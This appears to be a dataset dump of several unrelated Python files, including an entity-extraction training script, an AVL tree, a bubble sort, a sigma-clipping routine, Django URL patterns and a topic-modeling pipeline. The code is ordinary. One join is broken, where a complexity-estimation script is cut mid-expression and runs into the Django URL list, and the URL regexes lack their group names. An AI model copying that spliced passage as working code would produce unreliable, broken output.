_tokenize(self, text):\n        tokens = []\n        for c in text:\n            if c in self._token_dict:\n                tokens.append(c)\n            elif self._is_space(c):\n                tokens.append('[unused1]')\n            else:\n                tokens.append('[UNK]')\n        return tokens\n\n\ntokenizer = OurTokenizer(token_dict)\n\n\ndef read_data():\n    # read the data and drop the '其他' (\"other\") category, whose subject label is NaN\n    data = pd.read_csv('data/train.csv', header=None)\n    data = data[data[2] != '其他']\n    data = data[data[1].str.len() <= 256]\n\n    # collect every event category that occurs\n    if not os.path.exists('data/classes.json'):\n        id2class = dict(enumerate(data[2].unique()))\n        class2id = {j: i for i, j in id2class.items()}\n        json.dump([id2class, class2id], open('data/classes.json', 'w', encoding='utf-8'), ensure_ascii=False)\n    else:\n        id2class, class2id = json.load(open('data/classes.json', encoding='utf-8'))\n\n    # drop samples whose event subject does not appear in the original sentence\n    train_data = []\n    for t, c, n in zip(data[1], data[2], data[3]):\n        if n in t:\n            train_data.append((t, c, n))\n\n    # shuffle and split the dataset\n    random_order = shuffle(train_data, seed=seed)[0].tolist()\n    train_data = random_order[0:int(0.98 * len(random_order))]\n    dev_data = random_order[int(0.98 * len(random_order)):]\n\n    # extra data\n    new_data = pd.read_csv('new_data.csv')\n    for t, c, n in new_data.values:\n        train_data.append((t, c, n))\n\n    train_data = shuffle(train_data, seed=seed)[0].tolist()\n\n    for d in train_data + dev_data:\n        additional_chars.update(re.findall(u'[^\\u4e00-\\u9fa5a-zA-Z0-9\\*]', d[2]))\n\n    additional_chars.remove(u',')\n\n    # use the validation set as the test set\n    dev = pd.read_csv('data/eval.csv', encoding='utf-8', header=None)\n    test_data = []\n    for id, t, c in zip(dev[0], dev[1], dev[2]):\n        test_data.append((id, t, c))\n\n    return train_data, dev_data, test_data, id2class, class2id\n\n\ndef list_find(list1, list2):\n    \"\"\"Search list1 for the sublist list2: return the first index if it is found,\n    otherwise return -1.\n    \"\"\"\n    n_list2 = len(list2)\n    for i in range(len(list1)):\n        if list1[i: i + n_list2] == list2:\n            
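# sublist found: i is the first index at which list2 occurs inside list1\n            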
return i\n    return -1\n\n\ndef seq_padding(X, padding=0):\n    max_len = max([len(x) for x in X])\n    return np.array([\n        np.concatenate([x, [padding] * (max_len - len(x))]) if len(x) < max_len else x for x in X\n    ])\n\n\ndef data_generator(data, batch_size):\n    while True:\n        X, segment, start, end, max_length = [], [], [], [], 0\n        for i, d in enumerate(data):\n            text, c = d[0][:max_len], d[1]\n            # x = f'___{c}___{text}'\n            # tokens = tokenizer.tokenize(first=text, second=c)\n            # if len(tokens) > max_length:\n            #     max_length = len(tokens)\n\n            sub = d[2]\n            # sub_token = tokenizer.tokenize(sub)[1:-1]\n            # s = list_find(tokens, sub_token)\n            s = text.find(sub)\n            if s != -1:\n                e = s + len(sub) - 1\n\n                x, seg = tokenizer.encode(first=text, second=c)\n                if len(x) > max_length:\n                    max_length = len(x)\n\n                X.append(x)\n                segment.append(seg)\n                start.append(s)\n                end.append(e)\n\n            if len(X) == batch_size or i == len(data) - 1:\n                X = pad_sequences(X, maxlen=max_length)\n                segment = pad_sequences(segment, maxlen=max_length)\n                start = one_hot(start, max_length)\n                end = one_hot(end, max_length)\n                yield [X, segment, start, end], None\n                X, segment, start, end, max_length = [], [], [], [], 0\n\n\ndef softmax(x):\n    x = x - np.max(x)\n    x = np.exp(x)\n    return x / np.sum(x)\n\n\nnew_data = []\n\n\ndef extract_entity(text, category, class2id, model):\n    \"\"\"Decoding function; add more rules of your own to make sure the decoded\n    span really is a company name.\n    \"\"\"\n    if category not in class2id.keys():\n        return 'NaN'\n\n    # text_in = u'___%s___%s' % (category, text)\n    # text_in = text_in[:510]\n    # _tokens = tokenizer.tokenize(text_in)\n    # _tokens = tokenizer.tokenize(first=text, second=category)\n    text = text[:400]\n    x, s = tokenizer.encode(first=text, second=category, max_len=512)\n    prob_s, prob_e = model.predict([np.array([x]), np.array([s])])\n    prob_s, prob_e = softmax(prob_s[0]), softmax(prob_e[0])\n\n    for i, t in enumerate(text):\n        if len(t) == 1 and re.findall(u'[^\\u4e00-\\u9fa5a-zA-Z0-9\\*]', t) and t not in additional_chars:\n            prob_s[i] -= 10\n    start = prob_s.argmax()\n\n    for end in range(start, len(text)):\n        t = text[end]\n        if len(t) == 1 and re.findall(u'[^\\u4e00-\\u9fa5a-zA-Z0-9\\*]', t) and t not in additional_chars:\n            break\n    end = prob_e[start:end + 1].argmax() + start\n    res = ''.join(text[start: end + 1])\n\n    if prob_s[start] > 0.9 and prob_e[end] > 0.9:\n        new_data.append([text, category, res])\n\n    return res\n\n\nclass Evaluate(Callback):\n    def __init__(self, data, model, test_model, class2id):\n        self.ACC = []\n        self.best = 0.\n        self.passed = 0\n        self.dev_data = data\n        self.model = model\n        self.test_model = test_model\n        self.class2id = class2id\n\n    def on_batch_begin(self, batch, logs=None):\n        \"\"\"The first epoch is used for warmup; the second epoch lowers the\n        learning rate to its minimum.\n        \"\"\"\n        if self.passed < self.params['steps']:\n            lr = (self.passed + 1.) / self.params['steps'] * learning_rate\n            K.set_value(self.model.optimizer.lr, lr)\n            self.passed += 1\n        elif self.params['steps'] <= self.passed < self.params['steps'] * 2:\n            lr = (2 - (self.passed + 1.) / self.params['steps']) * (learning_rate - min_learning_rate)\n            lr += min_learning_rate\n            K.set_value(self.model.optimizer.lr, lr)\n            self.passed += 1
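\n            # Illustrative: with the script's learning_rate=1e-3 and min_learning_rate=1e-5 and, say, steps=1000,\n            # lr ramps from 1e-6 up to 1e-3 during epoch 1 and then decays back to 1e-5 during epoch 2.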
\n\n    def on_epoch_end(self, epoch, logs=None):\n        acc = self.evaluate()\n        self.ACC.append(acc)\n        if acc >= self.best:\n            self.best = acc\n            self.model.save_weights('output/subject_model.weights')\n        print('epoch: %d, acc: %.4f, best acc: %.4f\\n' % (epoch, acc, self.best))\n\n    # def evaluate(self):\n    #     eps = 0\n    #     error_list = []\n    #     for d in tqdm(iter(self.dev_data)):\n    #         R = extract_entity(d[0], d[1], self.class2id, self.test_model)\n    #         if R == d[2]:\n    #             eps += 1\n    #         else:\n    #             error_list.append((d[0], d[1], d[2], R))\n    #     with open('error.txt', 'w', encoding='utf-8')as file:\n    #         file.write(str(error_list))\n    #     return eps / len(self.dev_data)\n\n    def evaluate(self):\n        eps = 0\n        for d in tqdm(iter(self.dev_data)):\n            R = extract_entity(d[0], d[1], self.class2id, self.test_model)\n            if R == d[2]:\n                eps += 1\n        pre = eps / len(self.dev_data)\n\n        return 2 * pre / (pre + 1)\n\n\ndef dev(dev_data, class2id, test_model):\n    eps = 0\n    error_list = []\n    for d in tqdm(iter(dev_data)):\n        R = extract_entity(d[0], d[1], class2id, test_model)\n        if R == d[2]:\n            eps += 1\n        else:\n            error_list.append((d[0], d[1], d[2], R))\n    with open('error.txt', 'w', encoding='utf-8')as file:\n        file.write(str(error_list))\n\n    pre = eps / len(dev_data)\n    return (2 * pre) / (1 + pre)\n\n\ndef test(test_data, class2id, test_model):\n    \"\"\"Note: the official page says the fields are tab-separated, but they are\n    actually comma-separated.\n    \"\"\"\n    with open('result.txt', 'w', encoding='utf-8')as file:\n        for d in tqdm(iter(test_data)):\n            s = str(d[0]) + ',' + extract_entity(d[1].replace('\\t', ''), d[2], class2id, test_model)\n            file.write(s + '\\n')\n\n    print('length: ', len(new_data))\n    import json\n    dic = {'data': new_data}\n    with open('new_data.txt', 'w', encoding='utf-8')as file:\n        file.write(json.dumps(dic, ensure_ascii=False))\n\n\nif __name__ == '__main__':\n    batch_size = 16\n    learning_rate = 1e-3\n    min_learning_rate = 1e-5\n    epochs = 100\n    is_test = False\n\n    train_data, dev_data, test_data, id2class, class2id = read_data()\n\n    total_steps, warmup_steps = calc_train_steps(\n        num_example=len(train_data),\n        batch_size=batch_size,\n        epochs=epochs,\n        warmup_proportion=0.1,\n    )\n\n    model, test_model = Graph(total_steps, warmup_steps, lr=learning_rate, min_lr=min_learning_rate)\n\n    if is_test:\n        test_model.load_weights('output/subject_model.weights')\n        model.load_weights('output/subject_model.weights')\n        test(test_data, class2id, test_model)\n        # acc = dev(dev_data, class2id, test_model)\n        # print('acc: ', acc)\n    else:\n        # test_model.load_weights('output/subject_model.weights')\n        # model.load_weights('output/subject_model.weights')\n\n        evaluator = Evaluate(dev_data, model, test_model, class2id)\n        X = data_generator(train_data, batch_size)\n        steps = int((len(train_data) + batch_size - 1) / batch_size)\n\n        model.fit_generator(X, steps_per_epoch=100, epochs=epochs, callbacks=[evaluator])\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"247728391","text":"class Solution:\n    def isOneBitCharacter(self, bits) -> bool:\n        # count the 1s immediately preceding the final 0: if that count is odd, the last character must be the 2-bit one, so return False; otherwise it is the 1-bit one, so return True\n        pre_num = 0\n        if len(bits) < 2:\n            return True\n        if bits[-2] == 0:\n            return True\n        for i in range(len(bits) - 2, -1, -1):\n            if bits[i] == 1:\n                pre_num += 1\n            else:\n                break\n        if pre_num % 2 == 1:\n            return False\n        else:\n            return True\n\n\nif __name__ == 
'__main__':\n x = Solution()\n\n bits = [1, 0, 0]\n\n print(x.isOneBitCharacter(bits))\n","sub_path":"717. 1比特与2比特字符.py","file_name":"717. 1比特与2比特字符.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"205754236","text":"## Implementation of the AVL tree !!\n'''\n- still need to make pre order and post order traversal\n'''\nclass Node(object):\n\n\tdef __init__(self,data):\n\t\tself.data = data\n\t\tself.rightChild = None\n\t\tself.leftChild = None\n\t\tself.height = 0 # helps with checking if tree is balanced\n\t\t# Height of Node: length of longest path from it to leaf\n\nclass AVL(object):\n\n\tdef __init__(self):\n\t\tself.root = None\n\n\tdef calcHeight(self, node):\n\t\tif not node: # if the node is None\n\t\t\treturn -1\n\t\telse:\n\t\t\treturn node.height\n\n\t# if return value > 1, it means left heavy situations -> right rotation\n\t# if return value < -1, it means right heavy situations -> left rotation\n\t# if between -1 and 1, it is balanced\n\n\tdef calcBalance(self, node):\n\t\tif not node:\n\t\t\treturn 0\n\t\telse: \n\t\t\treturn self.calcHeight(node.leftChild) - self.calcHeight(node.rightChild)\n\n\t# Rotations to the right and the left are symmetrical operations\n\t# Rotation operations are quite fast as it it just updating references O(1) time complexity\n\tdef rotateRight(self,node):\n\t\t#print(\"Rotating to the right on node %d\" % node.data)\n\t\ttempLeft = node.leftChild\n\t\tt = tempLeft.rightChild\n\n\t\ttempLeft.rightChild = node\n\t\tnode.leftChild = t\n\n\t\t# update node's height by checking left and right sub tree\n\t\tnode.height = max(self.calcHeight(node.leftChild),self.calcHeight(node.rightChild)) + 1\n\t\ttempLeft.height = max(self.calcHeight(tempLeft.leftChild),self.calcHeight(tempLeft.rightChild)) + 1\n\n\t\t# return the new root node\n\t\treturn tempLeft\n\n\tdef rotateLeft(self,node):\n\t\t#print(\"Rotating to the left on node %d\" % node.data)\n\t\ttempRight = node.rightChild\n\t\tt = tempRight.leftChild\n\n\t\ttempRight.leftChild = node\n\t\tnode.rightChild = t\n\n\t\t# update node's height by checking left and right sub tree\n\t\tnode.height = max(self.calcHeight(node.leftChild),self.calcHeight(node.rightChild)) + 1\n\t\ttempRight.height = max(self.calcHeight(tempRight.leftChild),self.calcHeight(tempRight.rightChild)) + 1\n\n\t\t# return the new root node\n\t\treturn tempRight\n\n\t# Inserting data into AVL tree\n\t# need to check if we violated the AVL property\n\tdef insert(self,data):\n\t\tself.root = self.insertNode(data,self.root)\n\n\tdef insertNode(self,data,node):\n\t\tif not node: # base case so plug in the value\n\t\t\treturn Node(data)\n\t\telse:\n\t\t\tif data < node.data: # call recursively on left subtree to insert\n\t\t\t\tnode.leftChild = self.insertNode(data, node.leftChild)\n\t\t\telse: # call recursively on right subtree\n\t\t\t\tnode.rightChild = self.insertNode(data,node.rightChild)\n\n\t\t\t# update height parameter\n\t\t\tnode.height = max(self.calcHeight(node.leftChild),self.calcHeight(node.rightChild)) + 1\n\n\t\t\t# fixes any errors in the balance of the tree\n\t\t\treturn self.settleViolation(data,node)\n\n\tdef settleViolation(self,data,node):\n\t\tbalance = self.calcBalance(node)\n\t\t# Case 1: Greater than 1 -> left left heavy -> & current data is smaller than left child so -> simple right rotation\n\t\tif balance > 1 and data < node.leftChild.data:\n\t\t\t#print(\"Doubly left heavy situation...\")\n\t\t\treturn 
self.rotateRight(node)\n\n\t\t# Case 2: Less than -1 -> right right heavy -> & current data is greater than right child so -> simple left rotation\n\t\telif balance < -1 and data > node.rightChild.data:\n\t\t\t#print(\"Doubly right heavy situation...\")\n\t\t\treturn self.rotateLeft(node)\n\t\t# Case 3: Left right\n\t\telif balance > 1 and data > node.leftChild.data: # current data is greater than left (so its on right)\n\t\t\t#print(\"Left-right heavy situation...\")\n\t\t\tnode.leftChild = self.rotateLeft(node.leftChild)\n\t\t\treturn self.rotateRight(node)\n\t\t# Case 4: Right Left\n\t\telif balance < -1 and data < node.rightChild.data:\n\t\t\t#print(\"Right-left heavy situation...\")\n\t\t\tnode.rightChild = self.rotateRight(node.rightChild)\n\t\t\treturn self.rotateLeft(node)\n\n\t\treturn node\n\n\tdef traverse(self):\n\t\tif self.root:\n\t\t\tself.inOrderTraversal(self.root)\n\t\n\tdef inOrderTraversal(self, node):\n\t\tif node.leftChild:\n\t\t\tself.inOrderTraversal(node.leftChild)\n\n\t\tprint(\"%s\" % node.data)\n\n\t\tif node.rightChild:\n\t\t\tself.inOrderTraversal(node.rightChild)\n\n\t# Removing data:\n\tdef remove(self,data):\n\t\tif self.root: # if the root exists -> there are nodes\n\t\t\tself.root = self.removeData(data,self.root)\n\n\t# Using the predecessor method of removing data\n\tdef removeData(self,data,node):\n\t\tif not node: # base case: reached an empty subtree, so the key is not present\n\t\t\treturn node\n\n\t\tif data < node.data: # if smaller\n\t\t\tnode.leftChild = self.removeData(data,node.leftChild)\n\t\telif data > node.data:\n\t\t\tnode.rightChild = self.removeData(data,node.rightChild)\n\t\telse:\n\t\t\t# 1: if there are no children -> Leaf Node\n\t\t\tif not node.leftChild and not node.rightChild:\n\t\t\t\t#print(\"Removing leaf node...\")\n\t\t\t\tdel node\n\t\t\t\treturn None\n\t\t\telif not node.leftChild: # no left but would have right ^\n\t\t\t\t#print(\"Removing node with right child...\")\n\t\t\t\trightChild = node.rightChild\n\t\t\t\tdel node\n\t\t\t\treturn rightChild\n\t\t\telif not node.rightChild: # no right child\n\t\t\t\t#print(\"Removing node with left child...\")\n\t\t\t\tleftChild = node.leftChild\n\t\t\t\tdel node\n\t\t\t\treturn leftChild\n\t\t\telse:\n\t\t\t\t#print(\"Removing node with two children...\")\n\t\t\t\tpredecessor = self.getPredecessor(node.leftChild)\n\t\t\t\tnode.data = predecessor.data\n\t\t\t\tnode.leftChild = self.removeData(predecessor.data,node.leftChild)\n\n\t\tif not node:\n\t\t\treturn node\n\n\t\tnode.height = max(self.calcHeight(node.leftChild),self.calcHeight(node.rightChild)) + 1\n\t\t\n\t\tbalance = self.calcBalance(node)\n\n\t\t# Case 1: Greater than 1 -> left left heavy -> & left subtree is not right-heavy so -> simple right rotation\n\t\tif balance > 1 and self.calcBalance(node.leftChild) >= 0:\n\t\t\t#print(\"Doubly left heavy situation...\")\n\t\t\treturn self.rotateRight(node)\n\n\t\t# Case 2: Less than -1 -> right right heavy -> & right subtree is not left-heavy so -> simple left rotation\n\t\telif balance < -1 and self.calcBalance(node.rightChild) <= 0:\n\t\t\t#print(\"Doubly right heavy situation...\")\n\t\t\treturn self.rotateLeft(node)\n\t\t# Case 3: Left right\n\t\telif balance > 1 and self.calcBalance(node.leftChild) < 0: # left subtree is right-heavy\n\t\t\t#print(\"Left-right heavy situation...\")\n\t\t\tnode.leftChild = self.rotateLeft(node.leftChild)\n\t\t\treturn self.rotateRight(node)\n\t\t# Case 4: Right Left\n\t\telif balance < -1 and self.calcBalance(node.rightChild) > 0:\n\t\t\t#print(\"Right-left heavy situation...\")\n\t\t\tnode.rightChild = self.rotateRight(node.rightChild)\n\t\t\treturn self.rotateLeft(node)\n\n\t\treturn node \t\t\t\t\n
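\n\t# Note: this implementation always replaces a two-child node with its in-order predecessor\n\t# (the largest key of the left subtree); using the in-order successor instead would be equally valid.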
0:\n\t\t\t#print(\"Right-left heavy situation...\")\n\t\t\tnode.rightChild = self.rotateRight(node.rightChild)\n\t\t\treturn self.rotateLeft(node)\n\n\t\treturn node \t\t\t\t\n\n\tdef getPredecessor(self,node): # get largest value in left subtree\n\t\tif not node.rightChild:\n\t\t\treturn node\n\t\treturn self.getPredecessor(node.rightChild)\n\nif __name__ == \"__main__\":\n\tavl = AVL()\n\tavl.insert(10)\n\tavl.insert(20)\n\tavl.insert(5)\n\tavl.insert(6)\n\tavl.insert(15)\n\n\n\tavl.traverse()\n\tavl.remove(15)\n\tavl.remove(20)\n\tavl.traverse()\n","sub_path":"Pypeline/Pypes/AVLTree.py","file_name":"AVLTree.py","file_ext":"py","file_size_in_byte":6727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"325143527","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport xgboost as xgb\nimport math\nimport os \nimport re\nfrom xgboost import XGBClassifier,XGBRegressor\nfrom sklearn import cross_validation, metrics\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import LabelEncoder,OneHotEncoder\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.linear_model import ARDRegression\nfrom xgboost import plot_importance\nfrom sklearn.model_selection import KFold \nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nimport pickle\nimport seaborn as sns \n\n\nlabel_inverse_mappings = { } \nlabel_inverse_mappings[3] = 'N^2'\nlabel_inverse_mappings[6] = 'sqrtN'\nlabel_inverse_mappings[0] = 'LogN'\nlabel_inverse_mappings[1] = 'N'\nlabel_inverse_mappings[2] = 'N*sqrt(N)'\nlabel_inverse_mappings[4] = 'N^3'\nlabel_inverse_mappings[5] = 'NlogN'\n\nforward_mappings = { }\n\nforward_mappings['N^2']= 3\nforward_mappings['sqrtN']=6\nforward_mappings['LogN']=0\nforward_mappings['N']=1\nforward_mappings['N*sqrt(N)']=2\nforward_mappings['N^3']= 4\nforward_mappings['NlogN']= 5\n\n\n\n\ndef complexity_unitary( n , time_taken, p_time ):\n\n\t\tif(n==0):\n\t\t\treturn \"N\"\t\n\t\t# print(n,time_taken,p_time)\n\t\tcalc_time = [None]*7\n\t\tcalc_time[0] = math.log(n,2.0)*p_time;\n\t\tcalc_time[1] = n*math.sqrt(n)*p_time;\n\t\tcalc_time[2] = n*p_time;\n\t\tcalc_time[3] = n*math.log(n,2.0)*p_time;\n\t\tcalc_time[4] = n*n*p_time;\n\t\tcalc_time[5] = n*n*n*p_time;\n\t\tcalc_time[6] = math.sqrt(n)*p_time;\n\t\t\n\t\tmaxnum = 1e8\n\t\tind = -1 \n\n\t\tfor j in range(0,6):\n\t\t\tif abs(calc_time[j]-time_taken)[0-9]+)/$', views.student, name='student'),\n url(r'^get/studentList/', views.studentList, name='studentList'),\n url(r'^get/lecturer/(?P[0-9]+)/$', views.lecturer, name='lecturer'),\n url(r'^get/lecturerList/', views.lecturerList, name='lecturerList'),\n url(r'^get/group/(?P[0-9]+)/$', views.group, name='group'),\n url(r'^get/groupList/', views.groupList, name='groupList'),\n url(r'^get/project/(?P[0-9]+)/$', views.project, name='project'),\n url(r'^get/projectList/', views.projectList, name='projectList'),\n url(r'^get/listAll/', views.listAll, name='listAll'),\n url(r'^get/matching/', views.matching, name='matching'),\n url(r'^get/clearMatching/', views.clearMatching, 
name='clearMatching'),\n]\n","sub_path":"websys/pas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"526880557","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 23 14:23:25 2019\n\n@author: lingf\n\"\"\"\n\n#Bubble sort\n\nnumbers =['26','54','93','17','77','31','44','55','20']\n\nn = len(numbers)\n\nfor j in range(0,n-1): #outer loop: n-1 passes guarantee the list ends up fully sorted\n    offset = len(numbers)-j #which subset of outer loop you want to run inner loop to not repeat\n    for i in range(0, offset-1): #stop one position short of the end so numbers[i+1] never runs past the list\n        if numbers[i] > numbers[i+1]: #if number is larger than number in position above\n            temp_var = numbers[i] #make temporary variable\n            numbers[i] = numbers[i+1] #swap numbers around but don't overwrite\n            numbers[i+1] = temp_var\n    print(numbers)\n    \n    ","sub_path":"ling_bubble_sort.py","file_name":"ling_bubble_sort.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"313392292","text":"\"\"\" Utility functions and classes for SRP\n\nContext : SRP\nModule : Statistics.py\nVersion : 1.1.0\nAuthor : Stefano Covino\nDate : 03/08/2011\nE-mail : stefano.covino@brera.inaf.it\nURL: : http://www.merate.mi.astro.it/utenti/covino\n\nUsage : to be imported\n\nRemarks : input data are lists of x and weights\n\nHistory : (29/10/2010) First version.\n : (03/08/2011) Correction to weighting.\n\n\"\"\"\n\n\n\nimport numpy\n\nfrom .WeightedMeanFrame import WeightedMeanFrame\n\n\n\n\ndef CondSum (cumnum,cumden,x,wx,cond,it):\n    r1 = (numpy.add(cumnum,numpy.multiply(x,numpy.power(wx,-2))),numpy.add(cumden,numpy.power(wx,-2)),it+1)\n    r2 = (cumnum,cumden,it)\n    return numpy.where (cond, r1, r2) \n\n\n\ndef CondVar (cumnum,x,wa,cond,it):\n    r1 = (numpy.add(cumnum,numpy.power(numpy.subtract(x,wa),2)),it+1)\n    r2 = (cumnum,it)\n    return numpy.where (cond, r1, r2) \n\n\n\ndef AverSigmaClippFrame (x, wx=None, downsig=None, upsig=None, alla=False):\n    nx = []\n    nwx = []\n    # generate numpy arrays\n    for i in range(len(x)):\n        nx.append(numpy.array(x[i]))\n        if wx != None:\n            nwx.append(numpy.array(wx[i]))\n        else:\n            nwx.append(numpy.ones(nx[0].shape))\n    #\n    res = WeightedMeanFrame(nx,nwx)\n    wa = res[0]\n    ws = res[1]\n    we = res[2]\n    wexp = res[3]\n    #\n    if (downsig == None and upsig == None) or (len(nx) == 1):\n        # no condition, nothing to do\n        if alla:\n            return wa,wexp,ws,we\n        else:\n            return wa,wexp\n    #\n    numx = numpy.zeros(nx[0].shape)\n    denw = numpy.zeros(nx[0].shape)\n    nit = numpy.zeros(nx[0].shape) \n    #\n    for i in range(len(nx)):\n        if downsig != None and upsig == None:\n            # high-pass filter\n            condiz = (nx[i] >= numpy.subtract(wa,numpy.multiply(ws,downsig)))\n        elif downsig == None and upsig != None:\n            # low-pass filter\n            condiz = (nx[i] <= numpy.add(wa,numpy.multiply(ws,upsig)))\n        else:\n            # sigma-clipping\n            condiz = (numpy.logical_and((nx[i] >= numpy.subtract(wa,numpy.multiply(ws,downsig))),(nx[i] <= numpy.add(wa,numpy.multiply(ws,upsig)))))\n        #\n        resi = CondSum (numx,denw,nx[i],nwx[i],condiz,nit)\n        #\n        numx = resi[0]\n        denw = resi[1]\n        nit = resi[2]\n    #\n    # mean\n    waclp = numpy.divide(numx,denw)\n    # exposure map\n    wexpclp = numpy.divide(denw,numpy.max(denw))\n    #\n    # Go on computing only if explicitly required\n    if not alla:\n        return waclp,wexpclp\n    # var\n    numx = numpy.zeros(nx[0].shape)\n    nit = numpy.zeros(nx[0].shape) \n    #\n    
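# second pass: re-evaluate the clipping mask and accumulate the squared residuals used for the variance\n    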
for i in range(len(nx)):\n        if downsig != None and upsig == None:\n            # high-pass filter\n            condiz = (nx[i] >= numpy.subtract(wa,numpy.multiply(ws,downsig)))\n        elif downsig == None and upsig != None:\n            # low-pass filter\n            condiz = (nx[i] <= numpy.add(wa,numpy.multiply(ws,upsig)))\n        else:\n            # sigma-clipping\n            condiz = (numpy.logical_and((nx[i] >= numpy.subtract(wa,numpy.multiply(ws,downsig))),(nx[i] <= numpy.add(wa,numpy.multiply(ws,upsig)))))\n        #\n        resi = CondVar (numx,nx[i],waclp,condiz,nit)\n        #\n        numx = resi[0]\n        nit = resi[1] \n    #\n    wasclp = numpy.where(nit>1, numpy.divide(numx,nit-1), numpy.zeros(nx[0].shape))\n    # std and sterr\n    wsclp = numpy.sqrt(wasclp)\n    weclp = numpy.where(nit>1, numpy.divide(wsclp,numpy.sqrt(nit)), numpy.zeros(nx[0].shape))\n    #\n    return waclp,wexpclp,wsclp,weclp\n\n\n","sub_path":"Misc/SRPStatistics/AverSigmaClippFrame.py","file_name":"AverSigmaClippFrame.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"289136708","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.metrics import pairwise_distances\n\n# Gensim\nimport gensim\nfrom gensim import models\nimport gensim.corpora as corpora\nfrom gensim.models import CoherenceModel\n\n\nclass PipelineTopicModeling:\n    \n    def __init__(self, text_data, n_gram_set = 2, corpus_type = 'bow', model_list = ['lda'], number_of_topics = None, topn_terms = 30 ):\n        '''\n        text_data: list of strings (doc) of target documents \n        n_gram_set: 1 - unigram; 2 - bigram; 3 - trigram \n        corpus_type: 'bow' or 'tfidf' \n        model-list: 'lda','lda_mallet'\n        number of topics: \n        - int: \n        - list(range())\n        topn_terms: number of top terms kept per topic for evaluation\n\n\n\n        '''\n\n        self.string_corpus = text_data\n        self.token_corpus = [i.split() for i in self.string_corpus.tolist()]\n\n        self.id2word = corpora.Dictionary(self.token_corpus)\n\n        self.n_gram = n_gram_set\n        self.corpus_type = corpus_type\n        self.model_dict = None\n        \n        self.token_corpus_ngram = n_gram_builder(self.token_corpus,n_gram = self.n_gram)\n\n        self.freq_corpus = frequency_corpus_builder(self.token_corpus_ngram, self.id2word, self.corpus_type)\n\n\n        # Evaluation \n        self.topn_terms = topn_terms\n\n        \n\n    # def plot_results():\n\n\n\n\n\n    def tuning_result(self, model, topic_number, coherence_metric = 'c_v', topn_terms = 30,topn_saved = 10):\n        \n        topic_list = model2topics (model, topn_terms = topn_terms)\n        topic_list_saved = [','.join(i[:topn_saved]) for i in topic_list]\n        topic_list_saved.append(None)\n\n\n\n        coherence_score_list = within_topic_coherence (topic_list, \n                                        list_of_lists_tokens = self.token_corpus_ngram, \n                                        corpus = self.freq_corpus,\n                                        id2word = self.id2word, \n                                        topn_terms = topn_terms, \n                                        coherence_metric = 'c_v')\n\n        distance_score_list = between_topic_distance(model, distance_metric = 'cosine')\n\n        return pd.DataFrame([coherence_score_list,distance_score_list,topic_list_saved])\n\n    \n\n\n\n\n\n\n\n\n\n\n\n\n# n-gram builder - list of tokens \ndef n_gram_builder (list_of_lists_tokens, min_count=5, threshold=100, n_gram = 2):\n    '''\n    this function detects potential phrases (e.g. bigram and trigram) in the token list \n    Input: a list of lists of natural tokens (split by white space)\n    return: a list of lists with n-gram tokens \n    '''\n    if n_gram == 1:\n        return list_of_lists_tokens\n    else:\n        # Build the bigram and trigram models\n        bigram = gensim.models.Phrases(list_of_lists_tokens, min_count=min_count, threshold=threshold) # higher threshold fewer phrases. 
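(illustrative: with these settings a frequent token pair such as ('new', 'york') gets merged into the single token 'new_york')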
\n        # Faster way to get a sentence clubbed as a trigram/bigram\n        bigram_mod = gensim.models.phrases.Phraser(bigram)\n        \n        if n_gram == 3:\n            trigram = gensim.models.Phrases(bigram[list_of_lists_tokens], threshold=threshold) \n            trigram_mod = gensim.models.phrases.Phraser(trigram)\n            return [trigram_mod[bigram_mod[doc]] for doc in list_of_lists_tokens]\n        elif n_gram == 2:\n            return [bigram_mod[doc] for doc in list_of_lists_tokens]\n        else:\n            print('N-GRAM SETTING IS INVALID. PLEASE RESET IT TO 1, 2 OR 3!')\n\n\n# vector features \ndef frequency_corpus_builder(list_of_lists_tokens, id2word, freq_type = 'bow'):\n    bow_corpus = [id2word.doc2bow(text) for text in list_of_lists_tokens]\n\n    if freq_type == 'tfidf':\n        tfidf_model = models.TfidfModel(bow_corpus)\n        tfidf_corpus = tfidf_model[bow_corpus]\n        return tfidf_corpus\n    else:\n        return bow_corpus\n\n\n# models\n# Build LDA model\n\ndef tm_models (corpus, id2word, number_of_topics, model_selection, model_name = 'lda'):\n\n    if model_name == 'lda':\n\n        model = models.ldamodel.LdaModel(corpus = corpus,\n                                           id2word=id2word,\n                                           num_topics=number_of_topics, \n                                           random_state=100,\n                                           update_every=1,\n                                           chunksize=100,\n                                           passes=10,\n                                           alpha='auto',\n                                           per_word_topics=False)\n\n    elif model_name == 'lsi':\n\n        model = models.LsiModel(corpus = corpus,\n                                id2word =id2word,\n                                num_topics = number_of_topics)\n\n    else:\n\n        print('MODEL NAME CANNOT BE RECOGNISED!')\n\n\n    return model\n\n\ndef model2topics (model, topn_terms = 30):\n    list_of_topics = []\n    for i in range(model.num_topics):\n        topic_terms = []\n        for term, score in model.show_topic(i, topn = topn_terms):\n            topic_terms.append(term)\n        list_of_topics.append(topic_terms)\n    return list_of_topics\n\n\n# model evaluation \n\n\n\ndef within_topic_coherence (topics, list_of_lists_tokens, corpus, id2word, topn_terms = 30, coherence_metric = 'c_v'):\n    '''\n    For ‘c_v’, ‘c_uci’ and ‘c_npmi’ texts should be provided (corpus isn’t needed); \n    For 